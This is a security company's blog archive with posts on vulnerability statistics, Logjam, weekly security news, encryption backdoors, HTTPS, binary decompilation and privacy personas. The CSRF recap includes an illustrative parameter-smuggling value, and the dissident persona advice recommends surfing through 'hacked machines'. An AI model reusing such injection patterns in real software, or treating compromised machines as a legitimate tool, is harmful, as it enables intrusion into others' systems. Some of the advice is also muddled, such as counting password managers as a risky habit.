Category Archives: Technical Insight

WhiteHat Website Security Statistics Report: From Detection to Correction

While web security used to be a reactive afterthought, it has evolved to become a necessity for organizations that wish to conduct online business safely. Companies have switched from playing defense to playing offense in a game that is still difficult to win. In an effort to change the game, WhiteHat Security has been publishing its Website Security Statistics Report since 2006 in the hope of helping organizations improve web security before they fall victim to an attack.

After several editions, this is by far the most data-rich, educational, insightful and useful application security report I have ever read. I may be biased, but I believe this report is unique: something special and different that is an essential read for application security professionals. In creating this report, I have learned more about what works and what doesn’t than I have learned doing anything else in my many years of working in application security. I am extremely confident that our readers will appreciate what we have created for them.

In this year’s report, we examine the activities of real-world application security programs along with the most prevalent vulnerabilities, based on data collected from more than 30,000 websites under WhiteHat Sentinel management. From there, we can determine how many vulnerabilities get fixed, the average time it takes to fix them, and how every application security program can measurably improve. Our research provides insight into how organizations can better determine which security metrics to improve.

We’ve learned that vulnerabilities are plentiful, that they stay open for weeks or months, and that typically only half get fixed. We have become adept at finding vulnerabilities. The next phase is to improve the remediation process. In order to keep up with the increase in vulnerabilities, we need to make the remediation process faster and easier. The amount of time companies are vulnerable to web attacks is much too long – an average of 193 days from the first notification. Increasing the rate at which these vulnerabilities are remediated is the only way to protect users.

The best way to lower the average number of vulnerabilities, speed up time-to-fix, and increase remediation rates is to feed vulnerability results back to development through established bug tracking or mitigation channels. This places application security at the forefront of development and minimizes the need for remediation further down the road. The goal is more secure software, not more security software.

For security to improve, organizations need to set aside the idea of ‘best practices’ and not stop at compliance controls. Multiple parts of the organization must determine which teams should be held accountable for their specific job function. Organizations that don’t hold specific teams accountable have an average remediation rate of 24% versus 33% for companies that do. When you empower those who are also accountable, the organization has a higher likelihood of being effective.

In this year’s edition, the WhiteHat Website Security Statistics Report drives home the point that we now have a very clear understanding of what vulnerabilities are out there. Based on that information, we must create a solid, measurable remediation program to remove those vulnerabilities and increase the safety and security of the web.

To view the full report, click here. I would also invite you to join the conversation on Twitter at #WHStats @whitehatsec.

Logjam: Web Encryption Vulnerability

A team of researchers has released details of a new attack called “Logjam.” This attack, like FREAK, enables a man-in-the-middle attacker to downgrade the connection between the client and the server to an easier-to-break cipher. Many servers support these weaker ciphers, though there is no practical reason to support them. The solution is to simply not support any ciphers that are easy to break. In fact, the browser makers are doing that right now.

The offending ciphers, export-grade Diffie-Hellman ciphers, can be found in HTTPS, SSH, VPN, mail, and many other servers. This does not, however, mean that you are vulnerable, or that you need to panic. Exploiting this vulnerability requires a man-in-the-middle position and a high level of sophistication. The real risk here is relatively low compared to POODLE or Heartbleed. You should simply test your TLS endpoints to ensure that they do not support any weak ciphers. If you took this step back when FREAK came out, you are likely already okay.

The specific ciphers to disable for this attack are the DHE_EXPORT ciphers (or “EXP-EDH-” ciphers), but go ahead and disable all weak ciphers while you’re at it.
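As a quick client-side sanity check, you can ask your local TLS stack whether any export-grade suites would even be offered. This is a minimal sketch, assuming Python 3.6+ on a reasonably modern OpenSSL build; testing your actual server endpoints is still the real test.

```python
import ssl

# Build a default client context and list the cipher suites it would offer.
# On a modern OpenSSL build, export-grade ("EXP-") suites were removed
# entirely, so none should appear in the list.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("DEFAULT")
offered = [c["name"] for c in ctx.get_ciphers()]
export_suites = [name for name in offered if name.startswith("EXP-")]
print("export-grade suites offered:", export_suites or "none")
```

If that list is non-empty, the TLS stack itself is old enough to be a concern, independent of any server configuration.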

All WhiteHat Sentinel dynamic testing services (BE, SE, PE, PL, Elite) now report the use of export ciphers as part of reporting on weak ciphers, and specifically call out the ciphers that are a concern for Logjam.

The research team that released the report has also set up a page to test your servers here: https://weakdh.org/sysadmin.html.

Remember that when you test a hostname, you are really testing the TLS endpoint for that connection, which may be a load balancer or firewall, and not your application server.

#HackerKast 34: SOHO Routers hacked, 3d printed ammo, Nazis & child porn, PayPal Remote Code Execution, Dubsmash 2, Twitter CSRF

Hey Everybody! We’re back from our 1 week break due to crazy schedules and even now we are without Jeremiah. Coconuts don’t make great WiFi antennae or something.

Started this episode talking about some vendors who decided to do some weird, bad stuff this past week. In both stories security vendors were caught being naughty, starting with Tiversa, a security firm that decided it’d be a good idea to extort its own clients by reporting a fake vulnerability and asking for money to fix it. Then Tencent and Qihoo, two different Chinese AV vendors, were both caught cheating on a certification test of how good their products were.

Moving away from shady vendors and on to shady home wireless routers. Not news to anybody, really: wifi routers you buy off the shelf aren’t quite state of the art when it comes to security. Hence, we see some sort of router hacking story pop up all the time. This time SOHO routers were targeted by the hacking group Anonymous, as per a report from Incapsula. It seems Anonymous saw a good opportunity to exploit these home routers and use them as a botnet, running their DDoS tool for fun and profit. The extremely 1337 H@x0r methodology being used here, which takes many years of cyber security experience and probably a CISSP to exploit, is a default username and password. Try to keep up here, the DEFAULT USERNAME AND PASSWORD out of the box was used to compromise MILLIONS of home routers and turn them into DDoS bots. I’ll just leave that there.

Next, Robert talked about some of the most ridiculous topics we’ve covered on the podcast. He somehow related 3d printed ammunition to a story about Nazis and child pornography. You see, some court ruled that the computer file used to 3d print bullets is now legally considered munitions. In related(?) news, a Nazi camp website was hacked and had child pornography uploaded to it. When child porn is involved, the government must immediately confiscate the computers as evidence, which essentially takes the website offline. Robert related the two by pointing out that you could also upload a 3d printer file to the same effect, now that such a file can constitute illegal munitions.

In vulnerability disclosure news, PayPal was vulnerable to Remote Code Execution via a 3rd party library they were using. The Java Debug Wire Protocol using Shellifier was leaving port 8000 open on some Paypal servers, which allowed an attacker to gain access remotely — without authenticating — and execute commands. The part we don’t know yet is whether or how much PayPal paid the researcher who disclosed this to them. They’ve been known to pay big bounties in the past.

Robert then covered a fake mobile app called Dubsmash 2 that was uploaded to the Google Play store this week and became wildly popular. Dubsmash is a popular app that lets you lip sync to songs, but the fraudulent sequel wasn’t nearly as fun. What it did was immediately remove the “Dubsmash” branding and replace its icon with a mimic “Settings” icon. The moment a user clicked that icon, the app would generate thousands of pop-unders of porn sites and click on ads, presumably a pay-per-click fraud scheme generating earnings for the developer. To date, 500,000 users have downloaded the fake app.

Lastly, we talked about a CSRF vulnerability reported to Twitter via HackerOne about 11 months ago and recently disclosed publicly. This CSRF protection bypass was *very* creative and abused a behavior in certain frameworks that treats commas as semicolons. It allowed an attacker to exploit a user by sending a malicious link that let the attacker replay a stolen CSRF token on mobile.twitter.com. Really cool research that I’m glad eventually became public.
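To illustrate the class of bug (a hypothetical parser, not Twitter’s actual code), consider a framework that splits parameter strings on commas as well as semicolons. A single value containing a comma then silently becomes a second parameter, which can smuggle an attacker-controlled CSRF token past a naive check:

```python
import re

def lax_parse(qs: str) -> dict:
    # Illustrative only: some frameworks split on BOTH ';' and ',' per an
    # older reading of the HTTP spec. Later duplicates overwrite earlier ones.
    out = {}
    for pair in re.split(r"[;,]", qs):
        if "=" in pair:
            key, value = pair.split("=", 1)
            out[key] = value
    return out

# The attacker supplies one "value" containing a comma; the parser sees
# two separate parameters, the second being a planted CSRF token.
params = lax_parse("lang=en,authenticity_token=ATTACKER_TOKEN")
print(params)
```

A strict parser splitting only on `;` (or `&` for query strings) would have kept the whole string as the value of `lang`, and the injected token would never materialize.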

Thanks for listening! Check us out on iTunes if you want an audio-only version on your phone. Subscribe Here
Join the conversation over on Twitter at #HackerKast
or write us directly @jeremiahg, @rsnake, @mattjay

Resources:
Tiversa May Have Hacked Its Own Clients To Extort Them
2nd (Tencent and Qihoo) Chinese AV-Vendor Caught Cheating
3-D Printed Gun Lawsuit Starts the War Between Arms Control and Free Speech
Nazi camp website hacked with child porn on anniversary
MySQL Out of Band (2nd Order) Exploitation
Twitter CSRF Bug
PayPal Remote Code Execution (Java Debug Wire Protocol using Shellifier)
Your Smartphone Might Be Watching Porn Behind Your Back
Anonymous accused of running a botnet using thousands of hacked home routers

Notable stories this week that didn’t make the cut:
PHP == Operator Issue
Hack Google Password
Researchers Hijack Teleoperated Surgical Robot
Google PageSpeed Service End of Life
Windows to Kill Off Patch Tuesday
PortSwigger Web Security Blog: Burp Suite now reports blind XXE injection
Practical Cache Attacks in JavaScript
25 Members of $15M Carding Gang Arrested
Apple ‘test’ iPad stolen from a Cupertino home: Report
Irate Congressman Gives Cops Easy Rule – Follow The Damned Constitution

#HackerKast 32: WordPress Core XSS, Spoof Email Tanks Stock, Tesla Defacement via DNS Hack, 451 Status Code, MS15-034 Microsoft Vulnerability

Hey All! Thanks for checking out this week’s HackerKast! We’re all back and recovering from RSA and my feet still hurt.

Starting off with This Week In WordPress Sucks™, we’ve got a vulnerability in WordPress core this time. This is usually not the case, as core has been gone over several times with a fine-toothed comb, but some persistent XSS in core comment functionality popped up anyway. Also, as per usual, a few hundred plugins were vulnerable to an XSS found in two different frequently used, poorly documented functions. The core issue was patched already, but it is up to administrators of WordPress installs to race to get the patch installed.

Next, in silly things that affect the stock market news, Italy’s 2nd largest bank had a hoax email go out pretending to announce the CEO’s resignation. Within moments the stock took a huge dive, recovering only after everyone realized it was a hoax. We’ve seen this before a few times, notably when the Associated Press Twitter account was hacked and tweeted about a bomb at the White House, which caused the entire stock market to dip for a few minutes. This all points to the fact that there are automated stock trading systems out there making decisions based on social media and news information.

We had a little chat about the recent problem over at Tesla where their homepage was “defaced”. This wasn’t actually a defacement of any servers on their end; the attackers went after the recently popular low-hanging fruit of DNS providers. Once the DNS provider was owned, the homepage was redirected, along with the MX records, allowing email to be rerouted to the attackers. With this email rerouting in place, they then sent out some Twitter password reset emails, which allowed them to take over the social media accounts. What Robert and I touched on at the end is that Tesla was lucky this was all for the lulz, because that email rerouting, done carefully, could have silently MITMed the company’s email for some time before anybody noticed. Scary stuff, given how severe a compromise of your DNS provider can be.

A new status code has been proposed for the HTTP standard for the purpose of signaling a legally motivated block. Instead of just a 404, the browser would now be presented with a 451, meaning the content is legally restricted for any number of reasons. Most commonly this would show up for the geolocation-based content blocks that plenty of Netflix users are very aware of.
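For what it’s worth, newer versions of Python’s standard library already carry the code in its `http.HTTPStatus` enum, which makes for a quick way to see it (assuming Python 3.5+):

```python
from http import HTTPStatus

# 451 "Unavailable For Legal Reasons" sits alongside the familiar codes.
status = HTTPStatus.UNAVAILABLE_FOR_LEGAL_REASONS
print(status.value, status.phrase)  # 451 Unavailable For Legal Reasons
```

A server framework can return this enum member anywhere it would return a 404, so adopting the new code is mostly a one-line change.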

Lastly, MS15-034 came out, a Microsoft buffer overflow vulnerability in IIS servers. Of course Robert couldn’t help himself and wrote a snippet of exploit code. Then, in This Week In RSnake Posts Something Dangerous On Social Media™, he put this code on Twitter for people to play with. We’re toying with a possible demo of this for you all, but it might take some tinkering to make it interesting.

Thanks for listening! Check us out on iTunes if you want an audio-only version on your phone. Subscribe Here
Join the conversation over on Twitter at #HackerKast
or write us directly @jeremiahg, @rsnake, @mattjay

Resources:

XSS 0day in WordPress Core
Many WordPress Plugins Found Vulnerable to XSS
Fake Email Regarding CEO Resignation Tanks Stock
Tesla’s DNS and Twitter Account Hacked
New HTTP “Legally Restricted” Status Code Proposed
MS15-034 Buffer Overflow in Microsoft HTTP pt 1.
MS15-034 Buffer Overflow in Microsoft HTTP pt 2.
MS15-034 Buffer Overflow in Microsoft HTTP pt 3.

Notable stories this week that didn’t make the cut:

Thirty Meter Telescope Gets DDoS’d
Google’s April Fools Joke Actually Made Users Less Secure
Extremely Hackable eVoting Machine
Security Expert Pulled Off Flight by FBI After Exposing Airline Security Flaws
Senate Proposes Re-classifying Certain Uses of Software/Hardware as “Fair Use” and Exempt from DMCA
Navy Announces It Will Stop Buying Manned Aircraft
“Better Presentation of URLs in Search” Should Read “Removal of URLs In Search”
“The Real Deal” DarkNet 0Day Auction

#HackerKast 31: RSA San Francisco

We have a special and rare treat this week on HackerKast: Jeremiah, Matt and Robert all together in San Francisco for RSAC. They give a brief overview of some of the interesting conversations and topics they’ve come across.

A recurring topic in conversations with Robert is about how DevOps can improve security and help find vulnerabilities faster. Matt mentions Gauntlt, a cool new project that he contributes to. Gauntlt is a tool that puts security tools into your build-pipeline to test for vulnerabilities before the code goes to production.

Matt also mentions that his buddies at Verizon came out with data showing that people aren’t getting hacked by mobile apps. We haven’t seen large data breaches via mobile apps lead to any financial loss. With the recent surge in mobile use for sensitive data, are these types of data breaches something we should worry about?

On a more pleasant note, Jer was happy to hear that people and companies are realizing the importance of security. Industry leaders are now showing interest in doing application security the right way through a holistic approach.

Also at RSA, Jer talks security guarantees while Matt/Kuskos dive into our Top 10 Web Hacks.

Speaking of Government Backdoors

After Alex Stamos’ standoff with Admiral Mike Rogers, I got to thinking about what the Admiral must have meant when he insisted that government “front doors” were technically possible to create in a way that didn’t give the government ultimate access. Then a story came out about a split-key approach that is being studied. Let me explain why that is a bad idea and propose a technically less dangerous one.

Barring any conversations about the ethics, the legal conundrums, the loss of trust, the weakening of freedoms, the chilling effect, or the future where we have to provide similar access to any government that asks, there are some legitimate reasons this design is bad. First a brief primer on how split-keys work.

Let’s take a simple encryption algorithm that just uses the password “Will Wheaton” to decrypt the plaintext. Now let’s say government agency A (the FBI/NSA or some similar organization) has access to the first half of the password, “Will”. “Will Wheaton” is a very weak password, but it’s made significantly weaker when one party knows at least half of the secret. It gets worse, though. Let’s say government agency B (the FISA court) has the second half of the password, “Wheaton”. Eventually the two halves need to be combined somewhere: a physical place where both halves of the password are typed in at the same time. Let’s call it a SCIF for argument’s sake.

In this example the SCIF is now the one place where all secrets go, which makes it a prime target to attack. Both parties can now see the data, instead of just one, and there may be situations where truly only one party should see it. If the password is the same for every piece of encrypted information across all conversations, abuse is practically guaranteed once both halves are known. Not only is the original encryption significantly easier to break, since each party already holds half the key material, but the scheme also creates a single place where the two halves must be combined, and that place is far more likely to be abused.
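The keyspace math makes the weakening concrete. A toy sketch, assuming for illustration an 8-character lowercase password split into two 4-character halves (the real password and split would of course differ):

```python
# Brute-force work with and without knowledge of one half of the key.
ALPHABET = 26          # lowercase letters only, for illustration
FULL_LEN = 8           # hypothetical full password length
HALF_LEN = FULL_LEN // 2

full_keyspace = ALPHABET ** FULL_LEN   # attacker knows nothing
half_keyspace = ALPHABET ** HALF_LEN   # attacker holds one half already

print(f"full search space:  {full_keyspace:,}")
print(f"half search space:  {half_keyspace:,}")
print(f"work reduced by a factor of {full_keyspace // half_keyspace:,}")
```

Knowing half the key doesn’t halve the work; it takes the square root of it, which is why “each agency only has half” is far weaker than it sounds.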

What happens when access to that user’s data is no longer deemed useful? Does the key stop working? What if they find out they were mistaken and the data they were looking at is benign? Is there a way to disable their password? No. That’s not how passwords or keys work when they have to work everywhere, all the time. All they can do is tell Apple, or Google, or whoever created the backdoor, to change the user’s keys and create a different backdoor password. That’s one of the major drawbacks of this model. It could also inadvertently tip off the suspect if they notice a new key being issued, depending on how it was implemented.

Now let’s take a slightly different scenario where Apple/Google had a rolling window where passwords changed every day, say. One day it was “Will Wheaton” the next it was “Darth Vader” and so on. That way the FBI/NSA and the FISA courts could subpoena any piece of information but it had to be marked with a certain time period (say ten days and they would use their corresponding 10 keys split into two parts each for a grand total of 20 key-halves). That way, they only had access to certain pieces of information and only for that one conversation, and nothing after that time period. That has a better chance of being successful, but still relies on the parties to come together at some point and allows them both to see the resultant classified material.

A more useful approach would be to have four sets of keys for each time-slice of one day. Keys 1 and 2 belong to the FBI/NSA and Keys 3 and 4 belong to the FISA court. Key 1 would decrypt to a blob of further encrypted material that could only be decrypted fully by Key 3 (think of Key 1 as the outer layer of an onion and Key 3 as the inner layer needed to get to the center). Likewise, Key 4 would decrypt a blob of encrypted material that could only be fully decrypted by Key 2. That way you could guarantee that neither individual key could be subverted to fully decrypt without the other’s involvement. It would also allow either or both parties to see the resultant material should they need it, but not without each other’s approval, and it would guarantee that the key material couldn’t be abused beyond the time slice for the conversation in question.

So here is how it would break down. The FBI/NSA ask FISA for approval to decrypt User A’s conversation with User B. FISA agrees, and the FBI/NSA request that Apple/Google give them the time slices for Tuesday and Wednesday. Apple/Google respond with conversation identifiers 1234 and 1235 and the corresponding blobs of encrypted text (if the FBI/NSA don’t already have them). The FBI/NSA request that FISA decrypt the blobs with Key 4 (Tuesday) and Key 4 (Wednesday) corresponding to conversations 1234 and 1235. FISA returns two encrypted blobs that aren’t useful until the FBI/NSA apply their own Key 2 (Tuesday) and Key 2 (Wednesday) for the same time slices and conversations. The FBI/NSA decrypt the final encrypted blobs and are able to read the conversation. At this point Apple/Google know nothing about the data, only that it was subpoenaed. The FISA court was aware of and complicit in the decryption but never saw the data, and the FBI/NSA got only the data they requested and nothing more. If the court also needs to see the data, the corresponding Keys 1 and 3 are used for the same time-slice against the corresponding blobs of data.
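The onion layering above can be sketched with a toy cipher. This is purely illustrative (XOR with a repeating key is not a real cipher, and the key names are hypothetical), but it shows why neither agency can read the blob alone:

```python
from itertools import cycle

def toy_cipher(data: bytes, key: bytes) -> bytes:
    # XOR with a repeating key: applying it twice with the same key
    # undoes it, so the same function both "encrypts" and "decrypts".
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

# Hypothetical keys for one time slice: Key 2 held by the FBI/NSA,
# Key 4 held by the FISA court, as in the scheme sketched above.
key2 = b"nsa-key-two"
key4 = b"fisa-key-four"

plaintext = b"conversation 1234"
# The stored blob is wrapped twice: inner layer under Key 2, outer under Key 4.
blob = toy_cipher(toy_cipher(plaintext, key2), key4)

# FISA peels the outer layer with Key 4...
partial = toy_cipher(blob, key4)
# ...but the result is still ciphertext until the FBI/NSA apply Key 2.
recovered = toy_cipher(partial, key2)
```

In a real design each layer would be a proper authenticated cipher (so the peeling order is enforced, unlike commutative XOR), but the access-control property is the same: each party alone holds only ciphertext.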

Of course this is a huge burden, because now each user has four keys that need to be created for each day. Assuming there are 3 billion people in the world, and they use probably 3 different types of chatting systems per day, that would require something like 36 billion keys to be shared by two government agencies (18 billion each) per day. That’s a lot. Not to mention that keys wouldn’t just be short passwords, but presumably something like x509 or GPG certs, which can be quite large. And that also assumes that they can somehow get access to those keys in a way that the other (or malicious 3rd parties) can’t intercept or see. The devil lies deep in those details.

Ultimately though, I think Alex Stamos is right to press the government. Our industry thrives on trust, and if people believe that the government is spying on them, they are significantly less likely to transact or act normally – as themselves. Even if we can solve for the technical problems we have to be extremely thoughtful on how or even if we deploy it at all. Even when one’s only crime is one of thought or ideas, this kind of system dramatically increases the likelihood that the idea of freedom of expression will be lost in the annals of time. We all have to decide: would we rather have security in the form of big brother, or would we rather have privacy? We can’t have both, so we had better make up our minds now before the decisions are made on our behalf.

Please check out a similar and wonderfully written post by Matthew Green as well.

Web Security for the Tech-Impaired: The Importance of the ’S’

There’s one little letter that has huge importance when you’re logging into sites or buying your favorite items: the letter ’S’. The ’S’ I’m referring to is the ’S’ in HTTPS. You may never have noticed it in your web browser, or you may have seen it and never realized its importance. You may know it as that thing that gets added before the website you type in. What does it mean? Why is it important? You shall find these answers in this post!

HTTP and HTTPS are referred to as ‘protocols’. In essence, these protocols define how your computer will talk to another computer. As you browse the web, you may notice that some sites use HTTP while others use HTTPS. If you bring up CNN’s home page at edition.cnn.com, you’ll notice that the URL bar shows either http in front of the URL or just edition.cnn.com. This shows that the site is using the HTTP protocol to communicate. HTTP is a non-secure way of transmitting data from your computer to the website. Data sent over the HTTP protocol can be intercepted and read at any point between you and the website’s computer. This is what’s known as a ‘man-in-the-middle’ (MITM) attack: a person listening in on the virtual conversation between your computer and the website’s computer can look at all the data being sent. This isn’t a big deal if you’re reading articles on CNN or searching Wikipedia, but what if you log in to a site or buy something from an online store? You certainly don’t want the bad guys to know your username and password or your credit card number, so how do you protect yourself?

This is where the mighty ’S’ comes to the rescue. The protocol HTTPS is a way of securely sending data from your computer to the website you are interacting with. If a site is using HTTPS you’ll notice the HTTPS in front of the URL. As an example, go to www.facebook.com. In more modern and up-to-date browsers, you’ll likely see the HTTPS colored in either green or red and a lock icon. The green text with the lock icon is stating that you’re communicating securely with this website and everything looks to be going well.

If the https is red, there is probably some type of issue with the site security. It may be that the site’s certificate is out of date or invalid, or it may be that the site includes insecure third-party content, or there may be other issues. In any case, it is always safest not to proceed with a transaction that involves information you would like to keep secure if the HTTPS and lock icon are not green.

HTTPS uses a complicated system to encrypt the data you send to the website and vice versa. A bad guy performing an MITM attack will still see the conversation between you and the website, but it will be completely incoherent, like listening to a conversation in a language made up by the two people talking. Any time you are doing anything that requires a login, credit card number, social security number, or ANY private data, you want to make sure that you see the HTTPS protocol and, if you have the benefit of a modern browser, that the green lock icon is present. NEVER log in or give any sensitive information to a site that does not communicate over HTTPS.

Protecting your Intellectual Property: Are Binaries Safe?

Organizations have been steadily maturing their application testing strategies and in the next several weeks we will be releasing the WhiteHat Website Security Statistics report that explores the outcomes of that maturation.

As part of that research we explored some of the activities being undertaken as part of application security programs, and we were impressed to see that 87% of the respondents perform static analysis: 32% of them perform it with each major release, and 13% perform it daily.

This adoption of testing earlier in the software lifecycle is a welcome move. It is not a simple task for many companies to build out the policies that are essential for driving the maturity of an application security program.

We wanted to explore a policy that seems to have been conflated with the need to gain visibility into third-party software service providers’ and commercial off-the-shelf software (COTS) vendors’ products.

There seems to be a significant amount of confusion, and perhaps intentional fear, uncertainty and doubt (FUD), in this area. The way you go about testing third-party software should mirror the way you go about testing your own software. Binary analysis of software for the purpose of not exposing your Intellectual Property (IP) is where the question of measurable security lies.

Binaries can easily be decompiled, revealing nearly 100% of the source code. If your organization is distributing the binaries that make up your web application to a third party, you have effectively given them all the source code as well. This conflation of testing policies leads to a false sense of Intellectual Property protection.

Reverse engineering, while requiring some effort, is no problem. Tools such as ILSpy and Show My Code are freely and widely available. Sharing your binaries in an attempt to protect your Intellectual Property actually ends up exposing 100% of your IP.
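The same point can be made with an analogy in Python, where compiled bytecode, like .NET or Java binaries, carries its logic and constants in recoverable form. A small sketch using a hypothetical license check:

```python
import dis

# A "secret" compiled into the artifact ships with the artifact. This
# license check is hypothetical, but any string constant in compiled
# code is recoverable the same way.
def check_license(key: str) -> bool:
    return key == "SUPER-SECRET-LICENSE-KEY"

# The compiled function's constant pool exposes the secret directly...
print(check_license.__code__.co_consts)

# ...and the disassembler reconstructs the comparison logic itself.
dis.dis(check_license)
```

Decompilers for .NET and Java go a step further and emit readable source, which is exactly why handing out binaries offers no meaningful IP protection.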

Source and Binary

This video illustrates this point.

Educational Series: How lost or stolen binary applications expose all your intellectual property (from WhiteHat Security on Vimeo).

While customers are often required by policy to protect their source code, the only way to do that is to protect your binaries. That means being careful never to turn on the compilation options, which other vendors may require, that allow for binary review. At a very minimum, it means ensuring those same binaries never get uploaded to production where they may be exposed via vulnerabilities. Either way, if your requirement is to protect your IP, you need to make certain your binaries don’t fall into the wrong hands, because inside those binaries could be the keys to the castle.

For more information, click here to see the infographic on the two testing methodologies.

The Perils of Privacy Personas

Privacy is a complex beast, and depending on who you talk to, you get very different opinions of what is required to be private online. Some people really don’t care, and others really do. It just depends on the reasons why they care and the lengths they are both willing and able to go through to protect that privacy. This is a brief run-down on some various persona types. I’m sure people can come up with others, but this is a sampling of the kinds of people I have run across.

Alice (The Willfully Ignorant Consumer)

  • How Alice talks about online privacy: “I don’t have anything to hide.”
  • Alice’s perspective: Alice doesn’t see the issues with online advertising, governmental spying and doesn’t care who reads her email, what people do with her information, etc. She may, in the back of her mind, know that there are things she has to hide but she refuses to acknowledge it. She is not upset by invasive marketing, and feels the world will treat her the same way she treats it. She’s unwilling to do anything to protect herself, or learn anything beyond what she already knows. She’s much more interested in other things and doesn’t think it’s worth the time to protect herself. She will give people her password, because she denies the possibility of danger. She is a danger to all around her who would entrust her with any secrets.
  • Advice for Alice: Alice should do nothing. All of the terrible things that could happen to her don’t seem to matter to her, even when she is advised of the risks. This type of user is actually described by Microsoft’s research paper So Long, And No Thanks for the Externalities: The Rational Rejection of Security Advice by Users, which argues that spending time on security has a negative financial tradeoff for most of the population, at least in a vacuum where one person’s security does not impact another’s.

Bob (The Risk Taker)

  • How Bob talks about online privacy: “I know I shouldn’t do X but it’s so convenient.”
  • Bob’s perspective: Bob knows that bad things do happen, and is even somewhat concerned about them. However, he knows he doesn’t know enough to protect himself and is more concerned about usability and convenience. He feels that the more he does to protect himself, the more inconvenient life is. He can be summed up with the term “Carpe Diem.” Every one of his passwords is the same. He chooses weak security questions. He uses password managers. He clicks through any warning he sees. He downloads all of the programs he finds regardless of origin. He interacts on every social media site with a laissez-faire attitude.
  • Advice for Bob: He should pick email/hosting providers and vendors that naturally take his privacy and security seriously. Beyond that, there’s not much else he would be willing to change.

Cathy (The Average Consumer)

  • How Cathy talks about online privacy: “This whole Internet thing is terrifying, but really, what can I do? Tax preparation software, my utilities and email are essential. I can’t just leave the Internet.”
  • Cathy’s perspective: Cathy knows that the Internet is a scary place. Perhaps she or one of her friends has already been hacked. She would pick more secure and private options, but simply has no idea where to start. Everyone says she should take her security and privacy seriously, but how and who should she trust to give her the best advice? Advertisers are untrustworthy, security companies seem to get hacked all the time – nothing seems secure. It’s almost paralyzing. She follows whatever best practices she can find, but doesn’t even know where to begin unless it shows up in whatever publications she reads and happens to trust.
  • Advice for Cathy: Cathy should try to find options that have gone through rigorous third-party testing by asking for certificates of attestation, or attempt to self-host where possible (e.g., local copies of tax software versus Internet-based versions), and follow all best practices for two-factor authentication. She should use ad-blocking software and a VPN, and log out of anything sensitive when finished. Ideally she should use a second browser for banking, separate from the one she uses for general Internet activity. She shouldn’t click on links in emails, shouldn’t install unknown applications, and shouldn’t download even trustworthy applications from untrustworthy websites. If a site is unknown, has a bad or nonexistent BBB rating, or simply doesn’t look “right,” she should avoid it; it may have been hacked or taken over. She should also check the site’s reputation using Web of Trust or similar tools. She should look for the lock icon in her browser to make sure she is using SSL/TLS. She shouldn’t use public wifi connections. She should install all updates for the software already on her computer, uninstall anything she doesn’t need, and make sure any unnecessary services are disabled. If anything looks suspicious, she should ask a more technical person for help, and she should keep backups of everything in case of compromise.

Dave (The Paranoid Reporter)

  • How Dave thinks about online privacy: “I know the government is capable of just about anything. So I’ll do what I can to protect my sources, insofar as it still enables me to do my job.”
  • Dave’s perspective: Dave is vaguely aware of some of the programs the various government agencies have in place. He may or may not be aware that other governments are just as interested in his information as the US government. Therefore, he places his trust in the wrong places, mistakenly thinking he is somehow protected by geography or the rule of law. He will go out of his way to install encryption software, and possibly some browser security and privacy plugins/add-ons, such as ad-blocking software like Disconnect, or maybe even something more draconian like NoScript. He’s downloaded Tor once to check it out, and has a PGP/GPG key, which no one has ever used, posted on his website. He relies heavily on his IT department to secure his computer. But he uses all social media, chats with friends, has an unsecured phone and still uses third-party webmail for most things.
  • Advice for Dave: For the most part, Dave is woefully unequipped to handle sensitive information online. His phone(s) are easily tapped, his email is easily subpoenaed and his social media is easily crawled/monitored. His whereabouts are also constantly tracked in several different ways through his phone and social media. He is at risk of putting people’s lives in danger due to how he operates. He needs complete isolation and compartmentalization of his two lives: his work computer and his personal email/social presence should not intertwine. All sensitive work should be done over anonymous networks, using heavily encrypted data that ideally becomes useless after a certain period of time. He should be using burner phones, and he should avoid any easily discernible patterns when meeting with sources in person or talking to sources over the Internet.

Eve (The Political Dissident)

  • How Eve thinks about online privacy: “What I’m doing is life or death. Everyone wants to know who I am. It’s not paranoia if you’re right.”
  • Eve’s perspective: Eve knows the full breadth of government surveillance from all angles. She’s incredibly tuned in to how the Internet is effectively always spying on her traffic. Her life and the lives of her friends and family are at risk because of what she is working on. She cannot rely on anyone she knows to help her, because it would put them, and ultimately herself, at risk in the process. She is well read on all topics of Internet security and privacy, and she takes absolutely every precaution to protect her identity.
  • Advice for Eve: Eve needs to go to incredible lengths, using false identities to build up personas so that nothing is ever in her name. There should always be a fall-back secondary persona (also known as a backstop) that will take the fall if her primary persona is ever de-anonymized, instead of her actual identity. She should never connect to the Internet from her own house, but rather travel to random destinations and connect to wifi from distances that won’t make it visually obvious. Everything she does should be encrypted. Her operating system should use plausible deniability (e.g., VeraCrypt), and she should actually have a plausibly deniable reason for it to be enabled. She should use a VPN or hacked machines before surfing through a stripped-down version of Tails, running various plugins that ensure her browser is incapable of doing her harm. That includes plugins like NoScript, Request Policy, HTTPS Everywhere, etc. She should never use the same wifi connection twice, and should use different modes of transportation whenever possible. She should never use her own credit card, but instead trade in various forms of online crypto-currencies, pre-paid credit cards, physical cash and barter/trade. She should use anonymous remailers and avoid using the same email address more than once. She should regularly destroy all evidence of her actions before returning to any place where she might be recognized. She should avoid wearing recognizable outfits, and cover her face as much as possible without drawing attention. She should never carry a phone, but if she must, it should have the battery removed. Her voice should never be transmitted, due to voice-prints and phone-line/background noise forensics. All of her IDs should be put into a Faraday wallet. She should never create any social media accounts under her own name, never upload a picture of herself or her surroundings, and never talk to anyone she knows personally while surfing online. She should avoid using any jargon, slang or words that are unique to her location. She should never talk about where she is, where she’s from or where she’s going. She should never tell anyone in real life what she’s doing, and she should always have a cover story for every action she takes.

I think one of the biggest problems in our industry is that we tend to give generic one-size-fits-all privacy advice. As you can see above, this sampling of various types of people isn’t perfect, nor could it ever be. People’s backgrounds are so diverse and varied that it would be impossible to precisely fit any one person into any bucket. Therefore, privacy advice must be tailored to each person’s ability to understand it, their interest in protecting themselves, and the actual threat they’re facing.

Also, we are often talking at cross purposes when it comes to privacy versus security. Even if we didn’t have to worry about the intentions of those giving the advice, as discussed in that video, we still can’t necessarily rely on the advice itself. Nor can we rely on the advice being well taken by the person we give it to. One party might fully believe that they’re doing all they need to do, while in fact making things extremely dangerous for those around them who have higher security requirements.

Anything could be a factor in people’s needs/interest/abilities with regards to privacy – age, sex, race, religion, cultural differences, philosophies, their location, which government they agree with, who they’re related to, how much money they have, etc. Who knows how any of those things might impact their privacy concerns and needs? If we give people one-size-fits-all privacy advice it is guaranteed to be a bad fit for most people.

#HackerKast 29 Bonus Round: Formaction Scriptless Attack

